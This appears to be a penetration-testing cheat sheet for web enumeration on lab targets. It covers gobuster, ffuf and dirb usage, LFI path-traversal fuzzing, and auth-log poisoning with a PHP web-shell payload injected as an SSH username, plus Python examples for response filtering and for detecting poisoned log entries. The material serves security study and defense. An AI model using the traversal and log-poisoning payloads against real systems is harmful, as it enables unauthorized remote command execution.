HTTP and HTTPS

Ports 80 and 443

nikto -h 10.10.10.10

Dirb

dirb http://10.10.10.228/

Dirbuster

Gobuster

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.237/

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.237/ -t 42 -x .php,.txt

gobuster -w /SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt vhost -u http://monitors.htb

If the server answers every path with the same status code (for example 200 or 400), blacklist that code with -b; otherwise whitelist the codes you want to see with -s (gobuster will not accept both at once).

gobuster dir -u http://192.168.206.148:12380/ -w ../directory-list-2.3-medium.txt -t 32 -x .php,.txt -b 400
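How the catch-all calibration behind gobuster -b and ffuf -fc/-fs works, as an added Python example (not from the original notes, and not the tools' own code): request a few random canary paths, take the status/size pair they all share as the "not found" baseline, and keep only responses that differ from it. The response tuples and the canary values are constructed for the example.

```python
import random
import string
from collections import Counter

# Tolerance (bytes) when comparing body sizes against the catch-all baseline;
# a small wobble comes from the requested path being echoed into an error page.
SIZE_TOLERANCE = 32


def canary_path(length: int = 12) -> str:
    """A random path that should not exist; its response defines the baseline."""
    alphabet = string.ascii_lowercase + string.digits
    return "/" + "".join(random.choices(alphabet, k=length))


def calibrate(canary_responses):
    """canary_responses: (status, body_length) pairs from several canary requests.
    Returns the pair every canary got (a stable catch-all), or None if they disagree."""
    if not canary_responses:
        return None
    counts = Counter(canary_responses)
    (baseline, n), = counts.most_common(1)
    return baseline if n == len(canary_responses) else None


def is_interesting(response, baseline) -> bool:
    """Decide whether a (status, body_length) response deserves a second look."""
    status, length = response
    if baseline is None:
        return status != 404                     # no catch-all: plain 404 filtering is enough
    b_status, b_length = baseline
    if status != b_status:
        return True                              # anything but the catch-all code
    return abs(length - b_length) > SIZE_TOLERANCE   # same code, clearly different page


def suggest_flags(baseline):
    """Command-line filters equivalent to the calibration above (assumed mapping)."""
    if baseline is None:
        return {"gobuster": "", "ffuf": ""}      # tool defaults already drop 404s
    status, length = baseline
    # gobuster: drop the catch-all status; ffuf: drop the catch-all body size
    return {"gobuster": f"-b {status}", "ffuf": f"-fs {length}"}


if __name__ == "__main__":
    # Constructed responses for a server that answers 200 with a 1532-byte page to everything.
    canaries = [(200, 1532), (200, 1532), (200, 1532)]
    base = calibrate(canaries)
    print("baseline:", base, suggest_flags(base))
    for path, resp in [("/admin", (200, 4801)), ("/login", (301, 0)), ("/zz", (200, 1540))]:
        print(path, resp, "interesting" if is_interesting(resp, base) else "filtered")
```

The size check is what gobuster's -b alone does not give you: with a 200-for-everything server, blacklisting 200 also hides real pages, so filter on the catch-all body size (ffuf -fs, or look at the sizes gobuster prints) instead.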

FFUF

ffuf -w SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://undiscovered.thm/ -H "Host: FUZZ.undiscovered.thm" -fc 302

-fc 302 hides responses with that status code, here the catch-all answer the default vhost gives for unknown hostnames.

ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u "http://192.168.120.14/secret_information/?lang=../../../../../../../FUZZ"

For .php pages, test file-style parameters (for example ?file=) for LFI.

Auth log poisoning: if the LFI can read /var/log/auth.log, get PHP into the log by attempting an SSH login with the payload as the username, then include the log and pass the command in a second parameter. Use double quotes inside the payload so the outer single quotes survive the shell:

ssh '<?php system($_GET["cmd"]); ?>'@192.168.120.170

http://192.168.120.80/console/file.php?file=../../../../../var/log/auth.log&cmd=id

This only works when the web server's user can read auth.log (on Debian/Ubuntu it is normally root:adm, mode 640, so the include fails unless permissions were loosened) and sshd records the invalid username in full.
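The same technique seen from the defender's side, as an added Python example (not part of the original notes): scan sshd lines in auth.log for usernames that carry PHP, which is exactly the artifact the ssh command above leaves behind. The log lines are constructed for the example in the Debian/Ubuntu syslog format; the hostnames and addresses are made up.

```python
import re

# Constructed sample of sshd lines as rsyslog writes them to /var/log/auth.log
# (written for this example, not captured from a real host).
SAMPLE_AUTH_LOG = """\
Mar  4 10:12:01 web01 sshd[2311]: Invalid user admin from 192.168.120.5 port 51122
Mar  4 10:12:03 web01 sshd[2311]: Failed password for invalid user admin from 192.168.120.5 port 51122 ssh2
Mar  4 10:13:40 web01 sshd[2340]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.120.5 port 51130
Mar  4 10:13:42 web01 sshd[2340]: Failed password for invalid user <?php system($_GET["cmd"]); ?> from 192.168.120.5 port 51130 ssh2
Mar  4 10:15:00 web01 sshd[2360]: Accepted publickey for deploy from 10.0.0.7 port 40022 ssh2
"""

# Username as sshd records it for unknown accounts, followed by the peer address.
INVALID_USER = re.compile(
    r"[Ii]nvalid user (?P<user>.+?) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# Markers of a PHP payload: open tag, request superglobal, or a command-execution function.
PHP_MARKERS = re.compile(
    r"<\?(?:php|=)|\$_(?:GET|POST|REQUEST|COOKIE)|\b(?:system|exec|passthru|shell_exec|eval)\s*\(",
    re.IGNORECASE,
)


def is_php_payload(username: str) -> bool:
    """True if the logged username looks like PHP meant to be included later."""
    return PHP_MARKERS.search(username) is not None


def find_poisoned_usernames(log_text: str) -> list:
    """Return sorted, deduplicated (source_ip, username) pairs for poisoning attempts."""
    hits = set()
    for line in log_text.splitlines():
        m = INVALID_USER.search(line)
        if m and is_php_payload(m.group("user")):
            hits.add((m.group("ip"), m.group("user")))
    return sorted(hits)


if __name__ == "__main__":
    for ip, user in find_poisoned_usernames(SAMPLE_AUTH_LOG):
        print(f"auth.log poisoning attempt from {ip}: {user!r}")
```

Pair a hit like this with web access log entries that request auth.log through a file parameter; the pair is the whole attack chain.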
